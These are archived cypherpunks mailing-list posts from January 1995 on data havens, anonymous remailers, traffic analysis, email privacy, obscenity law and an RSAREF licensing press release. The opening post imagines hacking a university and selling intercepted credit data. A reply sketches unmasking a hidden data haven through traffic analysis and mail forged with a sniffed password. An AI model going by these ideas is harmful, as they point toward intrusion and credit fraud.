to run...I don't know. At the recent HoHoCon > there was a long discussion 'bout networks hidden within networks that was very > intriguing. If Doug Barnes is reading this he may be willing to reiterate some > of the talk. I do know that at the moment my partners and myself are looking > at remailer software running under Linux and data havens are something that we > have discussed. I personaly see data havens as a repository for information > that is beyond the keen of governments to regulate. This is the key point to > me. Not whether it is industrial secrets, military secrets, or .gif's that > jr. can get his rocks off over. This is something I have been doing seom writing on lately, teh idea of nets on top of nets, the almost fractal nature of networking of this scale and horizontal nature on the INternet. A DatHaven, like I mentioned in another post, is a vauge name, it could be some hacker kid with a lot of space on his HD and a fast modem who hacks the local univeristy and installes term, riggin his term connection to allow FTP connections, or telnet connections, or it oculd be someone with a decent size dinvestor backing him up as he gets a site linked ot teh net from some Carribean Island, who collects and intercepts TRW and Equifax like data on credit transactions and shit like that, selling it to those about to invest in soemone or something and want more info on it. OR maybe it's an elaborate set-up of mail aliases thru remailer chains and clearing stations that lead to data safe deposit boxes, where someone can leave a large amount of date anon, and then allow osmeone else to retrieve it anon also. With suffiecient planning, coding and equipment a datahaven could perform almost all the ideas that Tim came up with in his cyphernomicon, from selling crdit info, to a data drop box, to a holding agent for anon transactions(can't remember proper term). damn I wish I could have made it to HoHoCon. From lmccarth at ducie.cs.umass.edu Mon Jan 9 22:54:30 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 9 Jan 95 22:54:30 PST Subject: Anonymous videoconferencing applications Message-ID: <199501100644.BAA23178@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Alan Bostick writes: > I thought so too, at first; but then I thought of this obvious application: [lurid details omitted ;] "Ever seen your children bound and blindfolded from across the globe ? You will...." > Whether technology is going to be developed for the convenience of > kidnappers and terrorists is an open question. I'd answer, "Undoubtedly," but I wonder just how readily available such technology would be to, uh, the rest of us. > But there is clearly > at least this one clear use for anonymous video conferencing. Perhaps headhunters would find it handy for anonymous job interviews with candidates who prefer to remain nameless, but not jobless.... -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLxIrqmf7YYibNzjpAQGE9AQAlSGdkOEWsbXICCygoa4Sr+Gj9y91xHeS 3YpA40lODXDmvAoIxWRtpOt2k3a1G381xwxaSCh7b+Wh90V4dknS/ysvu/VLLdUG k1H/eGttn+TzcVPARc0fxExDV5yNxueDRaqil1sDnsgtVyBMzCmu6jdHKL4molku 5zN0SLh2RLY= =zmcz - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxIstCoZzwIn1bdtAQFiIQF9Ho6rMKp+ii7kSgFalxf8j+05ZHTFkxCc /LQUDOvxy1jXK5+EpaOwP/LyI5fru7YQ =ZD2g -----END PGP SIGNATURE----- From jpb at gate.net Mon Jan 9 22:54:53 1995 From: jpb at gate.net (jpb at gate.net) Date: Mon, 9 Jan 95 22:54:53 PST Subject: Thoughts on Data Havens In-Reply-To: <9501100322.AB12220@eri.erinet.com> Message-ID: <199501100630.BAA10057@hopi.gate.net> Re: > At 07:25 PM 1/9/95, dfloyd at io.com wrote: > > ... Of course, the DH will be hidden by a good remailer (anon.penet.fi), but > >it is trivial to use traffic analysis to find where the DH lies. Just > >monitor traffic from/to the remailer and do a series of store/retrives. > >Then for confirmation, forge a mail from the dh site to the remailer with > >the password (obtained from sniffing) to yourself. ... This is a known weakness of the wizvax style remailers. It is a shame that they are so easy for naive users to use - while I like the idea of an easy to use remailer, I have to shudder at how many people think that they are a secure system, especially when the reason they use them is usually because of a very real fear of the possible consequences if their lifestyle becomes public. > Hmm, hmm. Using c'punk remailers with encrypted send blocks fixes one > problem, especially if the c'punk mailers do some sort of file splitting and > reassembly along the lines of what happens to IP packets that are too large > for a given link. What would also help would be a mechanism for randomly > varying the encrypted send-to block. The password replay attacks can be > fixed by encrypting the transmitted password along with a timestamp/sequence > number. Post a new PGP key and encrypted address block weekly to alt.data.havens, alt.2600, or a stegoed picture to alt.binaries.pictures.whatever. If you are limiting usership, perhaps an autoencrypting majordomo list. If you do decide to go the steganography route, keep in mind that users on other platforms will want to use your DH and pick your stego program accordingly. As a Mac user, few things irritate me as much arj and zip files on ftp sites. gzip is a pain also, but at least I can un-gzip in my shell account before downloading. > One problem that remains would be a trail left by the increased traffic > to/from a DH vs a normal user. That could only be fixed by a multitude of > DH sites. One way of solving the traffic analysis problem is to have the DH account also act as a remailer. It would also be a good idea to only allow DH commands to be executed if the encrypted (mandatory) control message arrived from another remailer account - people knowledgeable enough to be using a dh will probably not mind if they are "forced" to route traffic through the remailer network - anyone paranoid enough to be a client is going to tack your address block on the end of a long chain they created themselves. As an added security measure, when a valid control message is received, an identical length stream of random garbage should then be encrypted and passed into the remailer pool. This would be easier if remailers supported some sort of bit sink command to trash a message rather than pass it along. Joe Block No man's life, liberty or property are safe while the legislature is in session. From lmccarth at ducie.cs.umass.edu Mon Jan 9 22:55:04 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 9 Jan 95 22:55:04 PST Subject: DH Traffic Volume Analysis Message-ID: <199501100612.BAA22933@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Paul J. Ste. Marie writes: > One problem that remains would be a trail left by the increased traffic > to/from a DH vs a normal user. That could only be fixed by a multitude of > DH sites. Ubiquitous remailing -- having a significant portion of the net population bouncing around randomly fluctuating encrypted traffic as background noise -- should help to cover both remailers and data havens. It would be nice to have more people firing off occasional encrypted stuff to muddy the waters. (Picture yourself in Bridge over the River Kwai if it helps ;) -L. Futplex McCarthy; PGP key by finger or server - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLxIkLGf7YYibNzjpAQGZfgQAp464Szt+W1pvcHQRLH39kmato3tQaHIn mNSNjeXBwWqrgIXYoLAQfcX1qvVb0NJQikGc4P7Xo/o7Aa2LOIWTt6TRxXlUkaod gmYr6XGvoCST1eciMeMTKRjVRJgA6p4/GmQwQwmvFtTus1waS5T+RsNX0nbCu3ng eg3sZ5s7pKI= =973H - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxIlNCoZzwIn1bdtAQFGBQF/Zl+lLTMyM55oRF2PSsA0ld13i/I1uyvW sD3C3JkqgQ9XsDjGquKXoPwDCsAEgN6E =7MWJ -----END PGP SIGNATURE----- From hfinney at shell.portal.com Mon Jan 9 23:02:20 1995 From: hfinney at shell.portal.com (Hal) Date: Mon, 9 Jan 95 23:02:20 PST Subject: for-pay remailers and FV Message-ID: <199501100701.XAA15283@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- From: Pierre Uszynski > Finally, I do not believe that introducing payment in the remailer > system would curb abuse in any significant way. Significant abuse is > that which causes significant problems for the operators: posting > secret religious technology, forging prime minister mail, harrassing a > member of any number of opposite persuasions, etc... Do you think for a > minute that a 5 cents postage is going to stop these messages now? And > how about when remailers do attain good reliability and untraceability, > for 3 cents? I had suggested an idea a while back where you would try to address the abuse issue directly rather than charging per message. I agree with Pierre that any reasonable per-message charge will not help in many forms of abuse, although it should address the worst spam attacks. The idea is to have a sort of digital cash token, but it is free. The key is that each person just gets one of these, but they are reusable. After a remailer sends a message, it waits and sees if it gets any complaints. If not, the token is re-blinded and made available to the original user via some kind of pool. He can then send another message. But if he commits abuse, he doesn't get his token back. Obviously there are problems with this, the worst probably being how we can keep people from acquiring lots of tokens under different names. Perhaps you could charge some small amount for them, but require VISA payment, and check the names on the VISA cards. (This doesn't hurt anonymity when the tokens are actually used because of the blinding.) To get multiple tokens a person would have to commit some serious real world name trickery, a considerably higher barrier than making up a pseudonym on the net. Another problem is that as stated above, you could only send one anonymous message every day or two. Perhaps we relax the rules and let people have a few of these tokens; they can then abuse the system a few times but each time they lose a token. A similar idea might work for the data haven problem, although I don't understand exactly what is intended there. This approach is a variation on the "is a person" credential, which attempts to make sure that each person only gets one of something. A lot of situations would benefit from such a credential, although some people don't like them. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLxIw2RnMLJtOy9MBAQGWCgH6A1SFyzZDDhd/NVrMck5SAf3mS4IOl5On aJNFKUopZi4Fb7tqQfbFukDl/lF+clnBDBNh/yXAsFcABJaWaTUzZA== =pLOT -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Mon Jan 9 23:31:44 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 9 Jan 95 23:31:44 PST Subject: Traffic generation Message-ID: <199501100736.CAA23603@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Joe Block writes: > As an added security measure, when a valid control message is received, > an identical length stream of random garbage should then be encrypted and > passed into the remailer pool. This would be easier if remailers supported > some sort of bit sink command to trash a message rather than pass it along. Lance Cottrell's Mixmaster software supports this -- just use Anon-To: null - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxI43yoZzwIn1bdtAQFNJwGAyLeVNnXjphXZFF9tznd4BI09+e4ec3z7 XjLgNg3qtNoxUM44ZkW0xsME+ot5B4A/ =q5OQ -----END PGP SIGNATURE----- From mccoy at io.com Mon Jan 9 23:54:41 1995 From: mccoy at io.com (Jim McCoy) Date: Mon, 9 Jan 95 23:54:41 PST Subject: Pornography, What is it? In-Reply-To: <199501100432.WAA00738@einstein.ssz.com> Message-ID: <199501100754.BAA23939@pentagon.io.com> > From: root [...] > > What you define as pornography doesn't mean shit, it's what the media and > > jornalists and fundies etc.. decide is pornographic that you gotta watch > > out for. [...] > > > I am well aware that what I personaly consider pornography carries little > weight. One minor nit. Pronography is not illegal, obscenity is what is regulated. The difference between the two the fine line upon which we tread. > As to data havens being dangerous to run...I don't know. At the recent > HoHoCon there was a long discussion 'bout networks hidden within networks > that was very intriguing. If Doug Barnes is reading this he may be > willing to reiterate some of the talk. I do know that at the moment my > partners and myself are looking at remailer software running under Linux > and data havens are something that we have discussed. That was my talk, and if I ever get around to it I will be putting my notes and design details for underground internetworking up on the web. These notes include the slides from the talk and the technical notes relating to this issue... jim From ChristopherA at consensus.com Tue Jan 10 00:16:36 1995 From: ChristopherA at consensus.com (Christopher Allen) Date: Tue, 10 Jan 95 00:16:36 PST Subject: PRESS RELEASE - RSA Licenses Commercial Distribution Rights to RSAREF (long) Message-ID: -----BEGIN PRIVACY-ENHANCED MESSAGE----- Proc-Type: 4,MIC-CLEAR Content-Domain: RFC822 Originator-Certificate: MIICRjCCAdsCBQJTAAAEMA0GCSqGSIb3DQEBAgUAME4xCzAJBgNVBAYTAlVTMRMw EQYDVQQIEwpDYWxpZm9ybmlhMSowKAYDVQQKEyFDb25zZW5zdXMgRGV2ZWxvcG1l bnQgQ29ycG9yYXRpb24wHhcNOTQwNjI3MDAwMDAwWhcNOTUwNjI2MjM1OTU5WjCB 4DELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExKjAoBgNVBAoTIUNv bnNlbnN1cyBEZXZlbG9wbWVudCBDb3Jwb3JhdGlvbjETMBEGA1UEERMKOTQxMTQt MzYxNTETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNU2FuIEZyYW5jaXNj bzEeMBwGA1UECRQVNDEwNC0yNHRoIFN0cmVldCCmNDE5MRIwEAYDVQQMEwlQcmVz aWRlbnQxGjAYBgNVBAMTEUNocmlzdG9waGVyIEFsbGVuMHAwDQYJKoZIhvcNAQEB BQADXwAwXAJVKa43Pd6AhLaYGRLMwvGGvZ7dtzK+XpsRtwKYEDQKHE8swS09ViEg MKuMa/+weQXDBpqQ6SDj/xgHGzmwGhkbeitPWr/6Du5gemMLrhhTs8eMhAXLXwID AQABMA0GCSqGSIb3DQEBAgUAA1YAEkQDfJmroAMZD5v1F7fPK38y4waoX0FSpdsf jcXf04URcEJc5dCFm0DzrMPMdVpNz5tpSBy0ZUeg/xqbwRfHIW34bMAVLc9kojIi AGXlHL/q8HRCIx== Issuer-Certificate: MIIB6TCCAVYCBQJBAAAKMA0GCSqGSIb3DQEBAgUAMFwxCzAJBgNVBAYTAlVTMSAw HgYDVQQKExdSU0EgRGF0YSBTZWN1cml0eSwgSW5jLjErMCkGA1UECxMiQ29tbWVy Y2lhbCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw05NDA1MDUwMTEwMDRaFw05 OTA0MzAwMTEwMDRaME4xCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlh MSowKAYDVQQKEyFDb25zZW5zdXMgRGV2ZWxvcG1lbnQgQ29ycG9yYXRpb24wcDAN BgkqhkiG9w0BAQEFAANfADBcAlUpc+2/Ec+bydwsB6enemznB/aQwd4gp2YSI3FW PHl2tc/aa7HZFA0qCL/0Ol6ituC+yUEO3IWKQ5U8hhl1RVqmW7mzwNOr2yeHIFA5 rqXvAvMvlGpvAgMBAAEwDQYJKoZIhvcNAQECBQADfgA2QEssX/nG3spHBpbkU4KV oQdVhxtQEmjuIrqBVI9jQRntacJ0tw1m5MsLV6hNMV/mD0yKmDc9ywSF7ZWIipVY tz8E52yQEprR+JxTad+/ZtTI0wEvEM5313jUF4ivF86eOuZDqHd4zbRHk6ggIAGH 86GFbMaWDaKoGUrde2== MIC-Info: RSA-MD5,RSA, J9l0zSgqnVqK8a9QQ3Ml+O6tv58PsVmCELOQTqj1i8HCQoHpJ+bEmayf4WyIbqoY y4xFecAPQfP5hpHPLVoLX4IM7kNT0UhDHW8XklfhhAVE1+Y0Og== Date: Mon, 09 Jan 1995 09:00:00 -0800 Subject: PRESS RELEASE - RSA Licenses Commercial Distribution Rights to RSAREF From: Christopher Allen Organization: Consensus Development Corporation, San Francisco, CA USA Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Text-Source: ftp://ftp.consensus.com/pub/consensus/pr/RSAREF-PR.txt X-HTML-Source: http://www.consensus.com:8300/RSAREF-PR.html Summary: RSA announces that it is licensing commercial distribution rights of its RSAREF software to Consensus Development, allowing for implementation of commercial Privacy Enhanced Mail (PEM) applications. Keywords: press release, consensus development corporation, rsa data security, rsaref, commercial license, support, marketing, maintenance, encryption, digital signature, source code, tool kit, PEM, privacy enchanced mail RSA Licenses Commercial Distribution Rights to RSAREF ===================================================== RSA announces that it is licensing commercial distribution rights of its RSAREF software to Consensus Development, allowing for implementation of commercial Privacy Enhanced Mail (PEM) applications. Press Release - ------------- REDWOOD SHORES, CALIFORNIA--JANUARY 9, 1995--RSA Data Security, Inc. and Consensus Development Corporation jointly announce today at the RSA Data Security Conference that Consensus Development is licensing the commercial distribution rights of RSAREF from RSA Data Security. RSAREF (pronounced "R.S.A. reff") is short for "RSA reference implementation" and is a cryptography source code toolkit designed to allow developers to create PEM (Privacy-Enhanced Mail)software and other encryption/authentication tools. Until now, RSAREF has been an unsupported RSA product approved for use only as part of freeware and not-for-profit software applications. Consensus Development will now be able to market and license RSAREF to commercial software developers, and provide software support and future enhancements to the RSAREF source code library. This announcement is significant because it is the first program of its kind to make the RSAREF implementation of RSA's popular patented authentication technology available to commercial vendors. "Data mailed, posted, or put on servers on the Internet is inherently untrustable today, " said Jim Bidzos, president of RSA. "Tampering with electronic documents takes no special skills, and leaves no trace.With the availability of RSAREF for both free software as well as commercial software there is no need for this situation to continue." Now that a commercial license to RSAREF is available, applications may now be developed and sold that incorporate Privacy-Enhanced Mail's authentication and encryption capabilities. Christopher Allen, President of Consensus Development adds "The PEM standards have been under development for a couple of years and only now are coming to fruition. The ability to offer both freeware developers and commercial software vendors a license to RSAREF will kickstart the adoption of PEM-capable mail software." Consensus Development will be creating an email discussion list for software developers interested in RSAREF. To join the discussion, send a message to with the body of the message requesting "subscribe RSAREF-DEV-L firstname lastname". Background - ---------- The RSA cryptosystem was invented and patented in the late 1970's by Drs. Rivest, Shamir, and Adleman, at the Massachusetts Institute of Technology, who started RSA Data Security in Redwood City, California, in 1982. Digital signatures are produced using the RSA Cryptosystem, which is a public-key cryptosystem. Each user has two keys - one public and one private. The public key can be disclosed without compromising the private key. Electronic documents can be "signed" with an unforgeable signature by using a document/private-key combination to produce a signature unique to the author and particular document. Anyone using an application that supports RSAREF and has the public key of the author can subsequently verify the authenticity of the document. Applications of digital signatures are endless: expense reports, electronic forms and purchase orders, contract revisions, engineering change orders, even tax returns can be electronically signed to speed electronic document flow and eliminate fraud. Furthermore, digital signatures can also be used to detect any virus before a program is executed, since any change whatsoever is detected. One reason that the paperless office has never materialized is that paper must still be printed so that handwritten signatures can be applied. RSAREF eliminates that necessity. Applications supporting RSAREF could have prevented last year's computer fraud at Dartmouth College, in which students were tricked into missing an important midterm by a fraudulent electronic mail message claiming to be from university faculty. Corporate Profiles - ------------------ RSA Data Security, Inc. is the acknowledged world leader in encryption technology, with over three million copies of its software encryption and authentication installed and in use worldwide. RSA is a defacto standard for encryption and digital signatures, and is part of existing and proposed standards for the Internet, CCITT, ISO, ANSI, IEEE and business and financial networks around the globe. RSA develops and markets platform-independent software developers' kits, end-user products, and provides comprehensive consulting services in the cryptographic sciences. RSA technology has been embedded in the products of many companies, including Microsoft, IBM, Apple, Oracle, General Magic, DEC, Sun, Novell, Lotus, Motorola, Northern Telecom, AT&T, WordPerfect, General Electric, Hughes Aircraft, and many others. The company is headquartered in Redwood City, California. Consensus Development Corporation is a software development and consulting firm specializing in the support of organizations that need long-distance collaboration via wide-area networks and the Internet.Consensus Development has been offering consulting and software tools in the area of collaboration support since 1988 and is based in San Francisco, California. Clients include Aladdin Systems, American Information Exchange (AMIX), America Online, Apple Computer, Attain, Authorware, Berrett-Koehler Publishers, Claris Corporation, Component Integration Laboratories, Connectix Corporation, Digicash bv, Group Technologies, InterCon, ON Technology, Portfolio Systems, RSA Data Security, Ronin Publishing, Software Ventures, Visa International, and Xanadu Operating Company. Contact - ------- Kurt Stammberger RSA Data Security, Inc. 415/595-8782 Christopher Allen Consensus Development Corporation 415/647-6383 $$ - ------------------------------------------------------------------------ ...Christopher Allen Consensus Development Corporation.. ... 4104-24th Street #419.. ... San Francisco, CA 94114-3615.. ... o415/647-6383 f415/647-6384.. ...Mosaic/WWW Home Page: .. ...Consensus Home Page .. -----END PRIVACY-ENHANCED MESSAGE----- Created with RIPEM Mac 0.8.5 b1 From craig at passport.ca Tue Jan 10 00:49:55 1995 From: craig at passport.ca (Craig Hubley) Date: Tue, 10 Jan 95 00:49:55 PST Subject: Files and mail In-Reply-To: <199501070212.SAA19162@netcom3.netcom.com> Message-ID: > "I'm Wozz" writes: > > > Any professional knows better than to read private > > mail...and if this is so...then they aren't worthy of having > > a site to run > > For legal purposes, most BBS systems declare that for the > purposes of the ECPA, there is no such thing as private mail on > their system. The Sysop is then free to read anything he wishes > to. This policy is clearly stated in the user agreements of > almost all BBS systems offering access to the public. This may be true of public access BBS systems, but on corporate sites the smart money pulls the other way. Smart corps avoid reading email for the same reason they avoid listening in on voice conversations (except in telemarketing etc.). Likelihood of a corporation being held liable for any abusive use of a system by an employee is drastically outweighed by the likelihood of a costly wrongful dismissal suit should any investigation of private correspondence reveal some private fact (e.g. they are gay, they are having an affair, etc.) that leads to their dismissal (and thus loss of access to the system!). In other words, abuse by managers of their supervisory priveleges is far more likely to come back and haunt the organization than abuse by employees, in legal terms anyway. At a recent seminar on doing business on the internet I stated this opinion to an audience that included at least 20 lawyers. None disagreed, the numbers are clear enough. One added the qualification, which I agree with, that pirated software that the organization directly benefits from is a specific exception where the organization is guilty until proven innocent. But he hastened to add that the rest of the argument stood up. We agreed that a 'software audit' program such as the SPA provides could meet that need without compromising end user privacy. Slowly I believe that Prodigy, AOL, etc., are getting this message, that it costs more to censor than not to. Reading of the week: "Defending Pornography", by the head of the ACLU (yes a woman) who argues that the fight against censorship is equivalent to the fight for women's rights, and historically has always had the same enemies. Kind words on the jacket from Friedan and other mainstream feminists. > > as for PGP, this is an individual thing....I'm sure mike > > has no such objections...i know here at MindVox we > > don't...in fact, we installed it for the users > > Many BBS Sysops forbid PGP and kick users off their systems who I can't speak to the paranoia of garage system operators but: > use it. They cite fears of encrypted illegal porn and credit > card numbers passing through their systems, and potential legal > liability. We work with a lot of large corporate clients using the internet. We have recommended PGP as a means of securing privacy for all corporate communications (note I don't use it from this site as I don't download all mail from here before reading it, a GUI PGP that was usable would go a long way to overcoming resistance) and deal only with BBS operators who fully support user privacy. As I suggest, we have recommended strongly against investigating the contents of mail etc., and have been backed by the lawyers of these organizations who see a nightmare of legal liability even in the *ability* to look. (When does the ability to look become an obligation to record? Go ask your service provider!) It seems to me that, although there have been some misguided prosecutions with serious impact on the livelihoods of some small operators, the defense that the operators did not know what was moving through their site has held up. Criminal liability hinges on knowledge of the act - you cannot be held criminally liable unless you knew what was going on... period. Exceptions to that ('guilty until proven innocent' doctrine that blames the publisher and forces them also to be a censor) are offensive to the principles of both the law and liberalism. I would cite broadcasting law as an example of such an abusive body of law, and note that it was written entirely in this century. The 'common carrier' status is not a silver bullet, it obligates carriers to co-operate with authorities to maintain that status, as it is specially granted. It is actually better to let it evolve by precedent, a 'de facto' common carrier defense, as that way it cannot be withdrawn by a government without special legislation that itself may be overturned by the courts (in constitutional democracies). In other words, keep on using PGP, ditch providers who forbid it, and recommend it to every company you can. Once it becomes clear to Ford and Kraft and GM that a decision to hold a BBS operator responsible for traffic that moved through his system without his intervention, is also likely to deem *them* responsible for employees (and suppliers!) once they have established internally a comfortable precedent of just leaving the mail alone... very expensive and disruptive to overturn... you can be damn sure that some serious campaign contributions will swing over to the privacy advocates. I make these assumptions: that corporate America, as commercial entities, have no interest in knowing about anything that is not directly related to the making of money. It does not want its business complicated by the necessity to become a censor of employee discussions. Piss tests etc. were an example of DoD over-control forcibly imposed on the private sector... with predictable results like the Intel Pentagronk (who ever heard of a serious system being built entirely without benefit of psychoactives?) With DoD spending disappearing, the military-industrial complex shrinking, this economic influence is reduced and we get more overt legislative attempts to exert control like the Clipper, motivated by 'civilian' concerns like 'kiddie porn' (gee Japan has no such laws and it hasn't collapsed yet, has lower incidence of child molestation too...) and 'violent porn' (same story, you can get it in Denmark and they have less rape than here...) and 'stolen goods' (which can be moved around easily enough by a hundred other means). In other words, the same lame excuses that politicians use every time they want to control people. But I don't think business is with the program, I think corporations only react to fear of liability etc. (which is kept heightened by governments with their own agenda) which can be reduced by education and measured by intelligent risk analysis. In my opinion, as the architect of several risk management systems, the latter demonstrates that the danger is less than 'most BBS operators' think, and it arises from different factors than they think, to wit: If a small service provider is prosecuted for moving alt.binaries.snuff through his system, it is not because he carries it: so do 500 other service providers, and they can't prosecute them all. It is because he was careless enough to indicate in non-PGP-encrypted email that he was intending to make a political donation to the prosecutor's opponent. Barring a nationwide crackdown, where the initial prosecution is always carefully chosen for minimum public sympathy, these random prosecutions are going to be motivated by the petty whims of cops and bureaucrats. I see no reason why one would leave one's opinions open to them to read. All that can do is make you a target, and who needs to be a target ? That said, I can understand their fear. If I were operating an internet service today, I doubt I would have posted this to cypherpunks (which I read primarily to protect my own privacy, that of my clients, and advise them on effective means of privacy protection). Now I'm probably on an NSA list somewhere... good thing I'm up here in Canada...! Craig Hubley Business that runs on knowledge Craig Hubley & Associates needs software that runs on the Web craig at passport.ca 416-778-6136 416-778-1965 FAX From carolb at barton.spring.com Tue Jan 10 01:16:36 1995 From: carolb at barton.spring.com (carolb) Date: Tue, 10 Jan 95 01:16:36 PST Subject: PRESS RELEASE - RSA Licenses Co In-Reply-To: Message-ID: Thanks, that was nice & handy, & scary. RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com carolann at mm.com ************************************************************************ COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM From skaplin at mirage.skypoint.com Tue Jan 10 03:24:11 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Tue, 10 Jan 95 03:24:11 PST Subject: Julf gets some negitive press!!! Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I found this surfing USENET. Very interesting... From: cmfaltz at panix.com (Titania) Subject: SIEGAL STRIKES AGAIN -- HEADS UP, FOLKS; CENSORS GETTING READY Date: 5 Jan 1995 09:28:40 -0500 Organization: The Q Continuum Lines: 112 Message-ID: <3egvmo$lfg at panix.com> NNTP-Posting-Host: panix.com Chck the blurb at the end of this reprint from the San Francisco Chronical -- bitch Siegel is complaining about net hoods again, while supplementing her income providing a how-to book for those hoods -- oh, she would say her book is informative, bringing Net abuses and scams to the public knowledge, but human nature being what it is, how much do you wanna bet scum have been buying up her little tome for ideas? Check 'er out, everyone -- she's the face of the enemy -- get ready. Reprinted from Monday's SF Chronicle *Anarchy, Chaos on the Internet Must End* Martha S. Siegel Elections are over, and, for better or worse, recognized leadership is installed and working in most places. Yet, in Cyberspace, the electronic world dominated by the much vaunted Internet, there is not much order. This huge international computer web tying together about 30 million people is governed by no one. What an amazing state of affairs. The most powerful commu- nication medium ever invented is being left to the equivalent of mob rule. Last year was the year of the Internet in the media. Clearly it is now in the mainstream. Nonetheless, judging by what you read or hear, the key question of who runs it is not even an issue. It is more fun, after all, to contemplate shopping in an electronic mall or how to order a pizza through a modem. No matter, if you scratch the surface of this big, happy party, the need for firm direction is all too obvious. Also reported in the press is an expanding array of Internet problems. Unregulated broadcasting of sexually explicit material that is readily available to children usually heads the list, but on-line sexual harassment, profanity, defamation, forgery and fraud run close seconds. The secretiveness that computer communications allows is a special reason why abuse is easy. National and personal security are serious considerations when anyone can, with complete anonymity, send encrypted information worldwide via the Internet. Such problems are further exacerbated by a computer in Finland called the Anonymous Server, which exists for the sole purpose of laundering computer messages, much like dirty money is laundered through small island nations. Consequently, if you want to, say, threaten someone with death, your risk of retribution is small, courtesy of the Anonymous Server. Nowhere are Cyberspace difficulties more evident than in the inevitable swing toward Internet commercialization. The widely reported turf war rages onbetween academic factions that controlled Internet before it went public and business newcomers who now want to access its huge audience. Electronic attacks on business people by means ranging from computer insults, called flames, to assorted forms of electronic vandalism, persist uncontrolled. Worst of all are the "canceller robots," computer programs meant to erase the communications of anyone the hackers who usually launch them want to silence. These self-styled vigilantes routinely challenge free speech in Cyberspace unabated. Internet access providers, companies that connect people to the Internet for a profit, likewise assume the role of censors, arbitrarily closing accounts of those whom they disapprove. Given its international nature, one obvious way to bring much needed order to the Internet is through diplomacy. The United States should lead in this. A good beginning might be to urge the Finnish government to deactivate the Anonymous Server. Diplomacy could also help to establish an international standard of recognizing laws existing at the point of origin as controlling the message sender. When conflicts arise, governmental diplomacy should again be the answer, just as it is with other trade and communications issues. Next, laws already regulating behavior in the real world should be applied to Cyberspace. This is already taking place on a case-by-case basi, but the process is too slow. The Supreme Court should act to create a precedent stating that crime is crime, even when the criminal instrument is a computer keyboard. In the United States, legislation should be passed making Internet providers common carriers. This will get them out of the business of censorship and under the guiding hand of the Federal Communications Commission. People need safety and order in Cyberspace just as they do in their homes and on the streets. The current state of the Internet makes it clear that anarchy isn't working. If recognized governments don't find a way to bring order to the growing and changing Internet, chaos may soon dictate that the party is over. ** Martha S. Siegel is the author of "How to Make a Fortune on the Information Superhighway" and CEO of Cybersell in Scottsdale, Arizona In any case, the San Fransisco Chronicle may be reached at: Letters to the Editor, San Fransisco Chronicle 901 Mission Street San Fransisco, Ca 94103 or you can fax a letter at (415) 512-8196 - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== Anyone who hates Dogs and Kids Can't be All Bad. -- W. C. Fields -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLxJtEMlnXxBRSgfNAQGz6gf/bwcCfyl+Cbktb/rGHUoudNWRKgXBjaNC 73V2FADhPRK+GIocliO6n/jNKetgfmvR7vKRkC98DuL5eJ4nek6XBqZ1eMBv0gBU FWSyRulYy3DJghWTUwFFuzm5GgNgC7j3kHOAdoLDys7FPaD7VprxD6esiIZnE/Ao rG2LqXrjQ3ofHqKiCxpldKJv51ttGZaWCbT39IfJOoB9dYs6vPTaDf7aOuqHfUKi +ZgwEwf/tM0x2BX6GuKCNXhFnPjL947kTQuSQ8JEcwHbvqAueMFaehNOtRczqwSj CBtwUYF9NIPmZ1kqEtJBQegDqj71xcD3c17NpjFAVjx1dz4ceIBRVQ== =FTmU -----END PGP SIGNATURE----- From root at einstein.ssz.com Tue Jan 10 04:07:20 1995 From: root at einstein.ssz.com (root) Date: Tue, 10 Jan 95 04:07:20 PST Subject: Pornography, What is it? In-Reply-To: <199501100754.BAA23939@pentagon.io.com> Message-ID: <199501101202.GAA00328@einstein.ssz.com> > [...] > > > What you define as pornography doesn't mean shit, it's what the media and > > > jornalists and fundies etc.. decide is pornographic that you gotta watch > > > out for. [...] > > > > > I am well aware that what I personaly consider pornography carries little > > weight. > > One minor nit. Pronography is not illegal, obscenity is what is regulated. > The difference between the two the fine line upon which we tread. > If this is so then everything I have read or seen misses this minor point completely. Every press release, speech, etc. that I see uses the term pornography, not obscenity. TV preachers, news anchors, newspapers, DA's, etc. consistently use the term pornography. The state of Oregon specificaly legalized pornography, not osbcenity. I think from a legal 